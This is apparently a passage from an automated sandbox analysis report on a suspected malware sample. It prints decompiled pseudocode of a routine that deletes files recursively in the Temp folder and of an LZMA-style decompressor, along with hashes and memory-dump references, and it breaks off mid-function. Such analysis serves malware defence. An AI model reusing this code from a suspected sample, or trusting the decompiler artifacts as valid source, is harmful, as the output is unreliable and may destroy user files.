                                                                                                                                                                            • Associated: 00000002.00000002.1202572962.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1202644162.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1202672082.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Global$Free$lstrcpy$Alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4227406936-0
                                                                                                                                                                            • Opcode ID: 108015169a1f9511be137f3b76d088d284be53ebd3be1ec406ce9b744c5ee79e
                                                                                                                                                                            • Instruction ID: 780798ea066e4ece118e8e5fed0bf18c828ec290136deaf2e43fc5d0554b8685
                                                                                                                                                                            • Opcode Fuzzy Hash: 108015169a1f9511be137f3b76d088d284be53ebd3be1ec406ce9b744c5ee79e
                                                                                                                                                                            • Instruction Fuzzy Hash: 17129971D0424ADFFB20CFA4C8847EEBBF4FB043C4F61852AD5A1A2199DB749A81CB51
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 755 40559b-4055c1 call 405859 758 4055c3-4055d5 DeleteFileA 755->758 759 4055da-4055e1 755->759 760 405764-405768 758->760 761 4055e3-4055e5 759->761 762 4055f4-405604 call 405cf9 759->762 764 405712-405717 761->764 765 4055eb-4055ee 761->765 768 405613-405614 call 4057b2 762->768 769 405606-405611 lstrcatA 762->769 764->760 767 405719-40571c 764->767 765->762 765->764 770 405726-40572e call 405ffd 767->770 771 40571e-405724 767->771 772 405619-40561c 768->772 769->772 770->760 778 405730-405744 call 40576b call 405553 770->778 771->760 775 405627-40562d lstrcatA 772->775 776 40561e-405625 772->776 779 405632-405650 lstrlenA FindFirstFileA 775->779 776->775 776->779 793 405746-405749 778->793 794 40575c-40575f call 404f12 778->794 781 405656-40566d call 405796 779->781 782 405708-40570c 779->782 789 405678-40567b 781->789 790 40566f-405673 781->790 782->764 784 40570e 782->784 784->764 791 40567d-405682 789->791 792 40568e-40569c call 405cf9 789->792 790->789 795 405675 790->795 796 405684-405686 791->796 797 4056e7-4056f9 FindNextFileA 791->797 805 4056b3-4056be call 405553 792->805 806 40569e-4056a6 792->806 793->771 799 40574b-40575a call 404f12 call 405bb4 793->799 794->760 795->789 796->792 801 405688-40568c 796->801 797->781 803 4056ff-405702 FindClose 797->803 799->760 801->792 801->797 803->782 815 4056c0-4056c3 805->815 816 4056df-4056e2 call 404f12 805->816 806->797 808 4056a8-4056b1 call 40559b 806->808 808->797 818 4056c5-4056d5 call 404f12 call 405bb4 815->818 819 4056d7-4056dd 815->819 816->797 818->797 819->797
                                                                                                                                                                            C-Code - Quality: 98%
                                                                                                                                                                            			E0040559B(void* __eflags, signed int _a4, signed int _a8) {
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				void* _v12;
                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                            				struct _WIN32_FIND_DATAA _v336;
                                                                                                                                                                            				signed int _t40;
                                                                                                                                                                            				char* _t53;
                                                                                                                                                                            				signed int _t55;
                                                                                                                                                                            				signed int _t58;
                                                                                                                                                                            				signed int _t64;
                                                                                                                                                                            				signed int _t66;
                                                                                                                                                                            				void* _t68;
                                                                                                                                                                            				signed char _t69;
                                                                                                                                                                            				CHAR* _t71;
                                                                                                                                                                            				void* _t72;
                                                                                                                                                                            				CHAR* _t73;
                                                                                                                                                                            				char* _t76;
                                                                                                                                                                            
                                                                                                                                                                            				_t69 = _a8;
                                                                                                                                                                            				_t73 = _a4;
                                                                                                                                                                            				_v8 = _t69 & 0x00000004;
                                                                                                                                                                            				_t40 = E00405859(__eflags, _t73);
                                                                                                                                                                            				_v16 = _t40;
                                                                                                                                                                            				if((_t69 & 0x00000008) != 0) {
                                                                                                                                                                            					_t66 = DeleteFileA(_t73); // executed
                                                                                                                                                                            					asm("sbb eax, eax");
                                                                                                                                                                            					_t68 =  ~_t66 + 1;
                                                                                                                                                                            					 *0x423788 =  *0x423788 + _t68;
                                                                                                                                                                            					return _t68;
                                                                                                                                                                            				}
                                                                                                                                                                            				_a4 = _t69;
                                                                                                                                                                            				_t8 =  &_a4;
                                                                                                                                                                            				 *_t8 = _a4 & 0x00000001;
                                                                                                                                                                            				__eflags =  *_t8;
                                                                                                                                                                            				if( *_t8 == 0) {
                                                                                                                                                                            					L5:
                                                                                                                                                                            					E00405CF9(0x420d10, _t73);
                                                                                                                                                                            					__eflags = _a4;
                                                                                                                                                                            					if(_a4 == 0) {
                                                                                                                                                                            						E004057B2(_t73);
                                                                                                                                                                            					} else {
                                                                                                                                                                            						lstrcatA(0x420d10, "\*.*");
                                                                                                                                                                            					}
                                                                                                                                                                            					__eflags =  *_t73;
                                                                                                                                                                            					if( *_t73 != 0) {
                                                                                                                                                                            						L10:
                                                                                                                                                                            						lstrcatA(_t73, 0x409014);
                                                                                                                                                                            						L11:
                                                                                                                                                                            						_t71 =  &(_t73[lstrlenA(_t73)]); // executed
                                                                                                                                                                            						_t40 = FindFirstFileA(0x420d10,  &_v336); // executed
                                                                                                                                                                            						__eflags = _t40 - 0xffffffff;
                                                                                                                                                                            						_v12 = _t40;
                                                                                                                                                                            						if(_t40 == 0xffffffff) {
                                                                                                                                                                            							L29:
                                                                                                                                                                            							__eflags = _a4;
                                                                                                                                                                            							if(_a4 != 0) {
                                                                                                                                                                            								_t32 = _t71 - 1;
                                                                                                                                                                            								 *_t32 =  *(_t71 - 1) & 0x00000000;
                                                                                                                                                                            								__eflags =  *_t32;
                                                                                                                                                                            							}
                                                                                                                                                                            							goto L31;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							goto L12;
                                                                                                                                                                            						}
                                                                                                                                                                            						do {
                                                                                                                                                                            							L12:
                                                                                                                                                                            							_t76 =  &(_v336.cFileName);
                                                                                                                                                                            							_t53 = E00405796( &(_v336.cFileName), 0x3f);
                                                                                                                                                                            							__eflags =  *_t53;
                                                                                                                                                                            							if( *_t53 != 0) {
                                                                                                                                                                            								__eflags = _v336.cAlternateFileName;
                                                                                                                                                                            								if(_v336.cAlternateFileName != 0) {
                                                                                                                                                                            									_t76 =  &(_v336.cAlternateFileName);
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            							__eflags =  *_t76 - 0x2e;
                                                                                                                                                                            							if( *_t76 != 0x2e) {
                                                                                                                                                                            								L19:
                                                                                                                                                                            								E00405CF9(_t71, _t76);
                                                                                                                                                                            								__eflags = _v336.dwFileAttributes & 0x00000010;
                                                                                                                                                                            								if(__eflags == 0) {
                                                                                                                                                                            									_t55 = E00405553(__eflags, _t73, _v8);
                                                                                                                                                                            									__eflags = _t55;
                                                                                                                                                                            									if(_t55 != 0) {
                                                                                                                                                                            										E00404F12(0xfffffff2, _t73);
                                                                                                                                                                            									} else {
                                                                                                                                                                            										__eflags = _v8 - _t55;
                                                                                                                                                                            										if(_v8 == _t55) {
                                                                                                                                                                            											 *0x423788 =  *0x423788 + 1;
                                                                                                                                                                            										} else {
                                                                                                                                                                            											E00404F12(0xfffffff1, _t73);
                                                                                                                                                                            											E00405BB4(_t72, _t73, 0);
                                                                                                                                                                            										}
                                                                                                                                                                            									}
                                                                                                                                                                            								} else {
                                                                                                                                                                            									__eflags = (_a8 & 0x00000003) - 3;
                                                                                                                                                                            									if(__eflags == 0) {
                                                                                                                                                                            										E0040559B(__eflags, _t73, _a8);
                                                                                                                                                                            									}
                                                                                                                                                                            								}
                                                                                                                                                                            								goto L27;
                                                                                                                                                                            							}
                                                                                                                                                                            							_t64 =  *((intOrPtr*)(_t76 + 1));
                                                                                                                                                                            							__eflags = _t64;
                                                                                                                                                                            							if(_t64 == 0) {
                                                                                                                                                                            								goto L27;
                                                                                                                                                                            							}
                                                                                                                                                                            							__eflags = _t64 - 0x2e;
                                                                                                                                                                            							if(_t64 != 0x2e) {
                                                                                                                                                                            								goto L19;
                                                                                                                                                                            							}
                                                                                                                                                                            							__eflags =  *((char*)(_t76 + 2));
                                                                                                                                                                            							if( *((char*)(_t76 + 2)) == 0) {
                                                                                                                                                                            								goto L27;
                                                                                                                                                                            							}
                                                                                                                                                                            							goto L19;
                                                                                                                                                                            							L27:
                                                                                                                                                                            							_t58 = FindNextFileA(_v12,  &_v336);
                                                                                                                                                                            							__eflags = _t58;
                                                                                                                                                                            						} while (_t58 != 0);
                                                                                                                                                                            						_t40 = FindClose(_v12);
                                                                                                                                                                            						goto L29;
                                                                                                                                                                            					}
                                                                                                                                                                            					__eflags =  *0x420d10 - 0x5c;
                                                                                                                                                                            					if( *0x420d10 != 0x5c) {
                                                                                                                                                                            						goto L11;
                                                                                                                                                                            					}
                                                                                                                                                                            					goto L10;
                                                                                                                                                                            				} else {
                                                                                                                                                                            					__eflags = _t40;
                                                                                                                                                                            					if(_t40 == 0) {
                                                                                                                                                                            						L31:
                                                                                                                                                                            						__eflags = _a4;
                                                                                                                                                                            						if(_a4 == 0) {
                                                                                                                                                                            							L39:
                                                                                                                                                                            							return _t40;
                                                                                                                                                                            						}
                                                                                                                                                                            						__eflags = _v16;
                                                                                                                                                                            						if(_v16 != 0) {
                                                                                                                                                                            							_t40 = E00405FFD(_t73);
                                                                                                                                                                            							__eflags = _t40;
                                                                                                                                                                            							if(_t40 == 0) {
                                                                                                                                                                            								goto L39;
                                                                                                                                                                            							}
                                                                                                                                                                            							E0040576B(_t73);
                                                                                                                                                                            							_t40 = E00405553(__eflags, _t73, _v8 | 0x00000001);
                                                                                                                                                                            							__eflags = _t40;
                                                                                                                                                                            							if(_t40 != 0) {
                                                                                                                                                                            								return E00404F12(0xffffffe5, _t73);
                                                                                                                                                                            							}
                                                                                                                                                                            							__eflags = _v8;
                                                                                                                                                                            							if(_v8 == 0) {
                                                                                                                                                                            								goto L33;
                                                                                                                                                                            							}
                                                                                                                                                                            							E00404F12(0xfffffff1, _t73);
                                                                                                                                                                            							return E00405BB4(_t72, _t73, 0);
                                                                                                                                                                            						}
                                                                                                                                                                            						L33:
                                                                                                                                                                            						 *0x423788 =  *0x423788 + 1;
                                                                                                                                                                            						return _t40;
                                                                                                                                                                            					}
                                                                                                                                                                            					__eflags = _t69 & 0x00000002;
                                                                                                                                                                            					if((_t69 & 0x00000002) == 0) {
                                                                                                                                                                            						goto L31;
                                                                                                                                                                            					}
                                                                                                                                                                            					goto L5;
                                                                                                                                                                            				}
                                                                                                                                                                            			}



















                                                                                                                                                                            0x004055a5
                                                                                                                                                                            0x004055aa
                                                                                                                                                                            0x004055b3
                                                                                                                                                                            0x004055b6
                                                                                                                                                                            0x004055be
                                                                                                                                                                            0x004055c1
                                                                                                                                                                            0x004055c4
                                                                                                                                                                            0x004055cc
                                                                                                                                                                            0x004055ce
                                                                                                                                                                            0x004055cf
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004055cf
                                                                                                                                                                            0x004055da
                                                                                                                                                                            0x004055dd
                                                                                                                                                                            0x004055dd
                                                                                                                                                                            0x004055dd
                                                                                                                                                                            0x004055e1
                                                                                                                                                                            0x004055f4
                                                                                                                                                                            0x004055fb
                                                                                                                                                                            0x00405600
                                                                                                                                                                            0x00405604
                                                                                                                                                                            0x00405614
                                                                                                                                                                            0x00405606
                                                                                                                                                                            0x0040560c
                                                                                                                                                                            0x0040560c
                                                                                                                                                                            0x00405619
                                                                                                                                                                            0x0040561c
                                                                                                                                                                            0x00405627
                                                                                                                                                                            0x0040562d
                                                                                                                                                                            0x00405632
                                                                                                                                                                            0x00405642
                                                                                                                                                                            0x00405644
                                                                                                                                                                            0x0040564a
                                                                                                                                                                            0x0040564d
                                                                                                                                                                            0x00405650
                                                                                                                                                                            0x00405708
                                                                                                                                                                            0x00405708
                                                                                                                                                                            0x0040570c
                                                                                                                                                                            0x0040570e
                                                                                                                                                                            0x0040570e
                                                                                                                                                                            0x0040570e
                                                                                                                                                                            0x0040570e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00405656
                                                                                                                                                                            0x00405656
                                                                                                                                                                            0x0040565f
                                                                                                                                                                            0x00405665
                                                                                                                                                                            0x0040566a
                                                                                                                                                                            0x0040566d
                                                                                                                                                                            0x0040566f
                                                                                                                                                                            0x00405673
                                                                                                                                                                            0x00405675
                                                                                                                                                                            0x00405675
                                                                                                                                                                            0x00405673
                                                                                                                                                                            0x00405678
                                                                                                                                                                            0x0040567b
                                                                                                                                                                            0x0040568e
                                                                                                                                                                            0x00405690
                                                                                                                                                                            0x00405695
                                                                                                                                                                            0x0040569c
                                                                                                                                                                            0x004056b7
                                                                                                                                                                            0x004056bc
                                                                                                                                                                            0x004056be
                                                                                                                                                                            0x004056e2
                                                                                                                                                                            0x004056c0
                                                                                                                                                                            0x004056c0
                                                                                                                                                                            0x004056c3
                                                                                                                                                                            0x004056d7
                                                                                                                                                                            0x004056c5
                                                                                                                                                                            0x004056c8
                                                                                                                                                                            0x004056d0
                                                                                                                                                                            0x004056d0
                                                                                                                                                                            0x004056c3
                                                                                                                                                                            0x0040569e
                                                                                                                                                                            0x004056a4
                                                                                                                                                                            0x004056a6
                                                                                                                                                                            0x004056ac
                                                                                                                                                                            0x004056ac
                                                                                                                                                                            0x004056a6
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040569c
                                                                                                                                                                            0x0040567d
                                                                                                                                                                            0x00405680
                                                                                                                                                                            0x00405682
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00405684
                                                                                                                                                                            0x00405686
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00405688
                                                                                                                                                                            0x0040568c
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004056e7
                                                                                                                                                                            0x004056f1
                                                                                                                                                                            0x004056f7
                                                                                                                                                                            0x004056f7
                                                                                                                                                                            0x00405702
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00405702
                                                                                                                                                                            0x0040561e
                                                                                                                                                                            0x00405625
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004055e3
                                                                                                                                                                            0x004055e3
                                                                                                                                                                            0x004055e5
                                                                                                                                                                            0x00405712
                                                                                                                                                                            0x00405714
                                                                                                                                                                            0x00405717
                                                                                                                                                                            0x00405768
                                                                                                                                                                            0x00405768
                                                                                                                                                                            0x00405768
                                                                                                                                                                            0x00405719
                                                                                                                                                                            0x0040571c
                                                                                                                                                                            0x00405727
                                                                                                                                                                            0x0040572c
                                                                                                                                                                            0x0040572e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00405731
                                                                                                                                                                            0x0040573d
                                                                                                                                                                            0x00405742
                                                                                                                                                                            0x00405744
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040575f
                                                                                                                                                                            0x00405746
                                                                                                                                                                            0x00405749
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040574e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00405755
                                                                                                                                                                            0x0040571e
                                                                                                                                                                            0x0040571e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040571e
                                                                                                                                                                            0x004055eb
                                                                                                                                                                            0x004055ee
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004055ee

                                                                                                                                                                            APIs
                                                                                                                                                                            • DeleteFileA.KERNELBASE(?,?,76803410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004055C4
                                                                                                                                                                            • lstrcatA.KERNEL32(00420D10,\*.*,00420D10,?,?,76803410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040560C
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00409014,?,00420D10,?,?,76803410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040562D
                                                                                                                                                                            • lstrlenA.KERNEL32(?,?,00409014,?,00420D10,?,?,76803410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405633
                                                                                                                                                                            • FindFirstFileA.KERNELBASE(00420D10,?,?,?,00409014,?,00420D10,?,?,76803410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405644
                                                                                                                                                                            • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004056F1
                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00405702
                                                                                                                                                                            Strings
                                                                                                                                                                            • "C:\Users\user\Desktop\Jjfmcz1Hsz.exe", xrefs: 0040559B
                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004055A8
                                                                                                                                                                            • \*.*, xrefs: 00405606
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1199265707.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1199203612.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199348328.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199395587.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199504236.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199619601.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199666920.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199710810.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199764798.0000000000436000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199807226.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199847230.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                            • String ID: "C:\Users\user\Desktop\Jjfmcz1Hsz.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                                                                            • API String ID: 2035342205-450739241
                                                                                                                                                                            • Opcode ID: 76f1e121bb52446e7845555e709951626bcbdf8363e3df3583460cf1e56453c6
                                                                                                                                                                            • Instruction ID: 44541a5d5af4c0b2911f4644f2fa5328a4f1ed3919081d24b86541679c9c03d6
                                                                                                                                                                            • Opcode Fuzzy Hash: 76f1e121bb52446e7845555e709951626bcbdf8363e3df3583460cf1e56453c6
                                                                                                                                                                            • Instruction Fuzzy Hash: 9F51CF30804A04BADF217A658C85BBF7AB8DF82318F54847BF445761D2C73D4982EE6E
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 98%
                                                                                                                                                                            			E00406344() {
                                                                                                                                                                            				unsigned short _t531;
                                                                                                                                                                            				signed int _t532;
                                                                                                                                                                            				void _t533;
                                                                                                                                                                            				void* _t534;
                                                                                                                                                                            				signed int _t535;
                                                                                                                                                                            				signed int _t565;
                                                                                                                                                                            				signed int _t568;
                                                                                                                                                                            				signed int _t590;
                                                                                                                                                                            				signed int* _t607;
                                                                                                                                                                            				void* _t614;
                                                                                                                                                                            
                                                                                                                                                                            				L0:
                                                                                                                                                                            				while(1) {
                                                                                                                                                                            					L0:
                                                                                                                                                                            					if( *(_t614 - 0x40) != 0) {
                                                                                                                                                                            						 *(_t614 - 0x34) = 1;
                                                                                                                                                                            						 *(_t614 - 0x84) = 7;
                                                                                                                                                                            						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
                                                                                                                                                                            						L132:
                                                                                                                                                                            						 *(_t614 - 0x54) = _t607;
                                                                                                                                                                            						L133:
                                                                                                                                                                            						_t531 =  *_t607;
                                                                                                                                                                            						_t590 = _t531 & 0x0000ffff;
                                                                                                                                                                            						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
                                                                                                                                                                            						if( *(_t614 - 0xc) >= _t565) {
                                                                                                                                                                            							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
                                                                                                                                                                            							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
                                                                                                                                                                            							 *(_t614 - 0x40) = 1;
                                                                                                                                                                            							_t532 = _t531 - (_t531 >> 5);
                                                                                                                                                                            							 *_t607 = _t532;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							 *(_t614 - 0x10) = _t565;
                                                                                                                                                                            							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                                                                                                                                                                            							 *_t607 = (0x800 - _t590 >> 5) + _t531;
                                                                                                                                                                            						}
                                                                                                                                                                            						if( *(_t614 - 0x10) >= 0x1000000) {
                                                                                                                                                                            							L139:
                                                                                                                                                                            							_t533 =  *(_t614 - 0x84);
                                                                                                                                                                            							L140:
                                                                                                                                                                            							 *(_t614 - 0x88) = _t533;
                                                                                                                                                                            							goto L1;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							L137:
                                                                                                                                                                            							if( *(_t614 - 0x6c) == 0) {
                                                                                                                                                                            								 *(_t614 - 0x88) = 5;
                                                                                                                                                                            								goto L170;
                                                                                                                                                                            							}
                                                                                                                                                                            							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
                                                                                                                                                                            							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                                                                                                                                            							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                                                                                                                                            							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                                                                                                                                                                            							goto L139;
                                                                                                                                                                            						}
                                                                                                                                                                            					} else {
                                                                                                                                                                            						__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                                                                                                            						__esi =  *(__ebp - 0x60);
                                                                                                                                                                            						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                                                                                                            						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                                                                                                            						__ecx =  *(__ebp - 0x3c);
                                                                                                                                                                            						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                                                                                                            						__ecx =  *(__ebp - 4);
                                                                                                                                                                            						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                                                                                                            						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                                                                                                            						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                                                                            						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                                                                            						if( *(__ebp - 0x38) >= 4) {
                                                                                                                                                                            							if( *(__ebp - 0x38) >= 0xa) {
                                                                                                                                                                            								_t97 = __ebp - 0x38;
                                                                                                                                                                            								 *_t97 =  *(__ebp - 0x38) - 6;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                                                                                                            							}
                                                                                                                                                                            						} else {
                                                                                                                                                                            							 *(__ebp - 0x38) = 0;
                                                                                                                                                                            						}
                                                                                                                                                                            						if( *(__ebp - 0x34) == __edx) {
                                                                                                                                                                            							__ebx = 0;
                                                                                                                                                                            							__ebx = 1;
                                                                                                                                                                            							L60:
                                                                                                                                                                            							__eax =  *(__ebp - 0x58);
                                                                                                                                                                            							__edx = __ebx + __ebx;
                                                                                                                                                                            							__ecx =  *(__ebp - 0x10);
                                                                                                                                                                            							__esi = __edx + __eax;
                                                                                                                                                                            							__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                            							__ax =  *__esi;
                                                                                                                                                                            							 *(__ebp - 0x54) = __esi;
                                                                                                                                                                            							__edi = __ax & 0x0000ffff;
                                                                                                                                                                            							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                            							if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                            								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                            								__cx = __ax;
                                                                                                                                                                            								_t216 = __edx + 1; // 0x1
                                                                                                                                                                            								__ebx = _t216;
                                                                                                                                                                            								__cx = __ax >> 5;
                                                                                                                                                                            								 *__esi = __ax;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                            								0x800 = 0x800 - __edi;
                                                                                                                                                                            								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                            								__ebx = __ebx + __ebx;
                                                                                                                                                                            								 *__esi = __cx;
                                                                                                                                                                            							}
                                                                                                                                                                            							 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                            							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                            								L59:
                                                                                                                                                                            								if(__ebx >= 0x100) {
                                                                                                                                                                            									goto L54;
                                                                                                                                                                            								}
                                                                                                                                                                            								goto L60;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								L57:
                                                                                                                                                                            								if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                            									 *(__ebp - 0x88) = 0xf;
                                                                                                                                                                            									goto L170;
                                                                                                                                                                            								}
                                                                                                                                                                            								__ecx =  *(__ebp - 0x70);
                                                                                                                                                                            								__eax =  *(__ebp - 0xc);
                                                                                                                                                                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                            								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                            								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            								_t202 = __ebp - 0x70;
                                                                                                                                                                            								 *_t202 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                            								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            								goto L59;
                                                                                                                                                                            							}
                                                                                                                                                                            						} else {
                                                                                                                                                                            							__eax =  *(__ebp - 0x14);
                                                                                                                                                                            							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                                            							if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                                            								__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                                            							}
                                                                                                                                                                            							__ecx =  *(__ebp - 8);
                                                                                                                                                                            							__ebx = 0;
                                                                                                                                                                            							__ebx = 1;
                                                                                                                                                                            							__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                                                                            							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                                                                            							L40:
                                                                                                                                                                            							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                                                                                                            							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                                                                                                            							__ecx =  *(__ebp - 0x58);
                                                                                                                                                                            							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                                                                                                            							 *(__ebp - 0x48) = __eax;
                                                                                                                                                                            							__eax = __eax + 1;
                                                                                                                                                                            							__eax = __eax << 8;
                                                                                                                                                                            							__eax = __eax + __ebx;
                                                                                                                                                                            							__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                                                                                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                            							__ax =  *__esi;
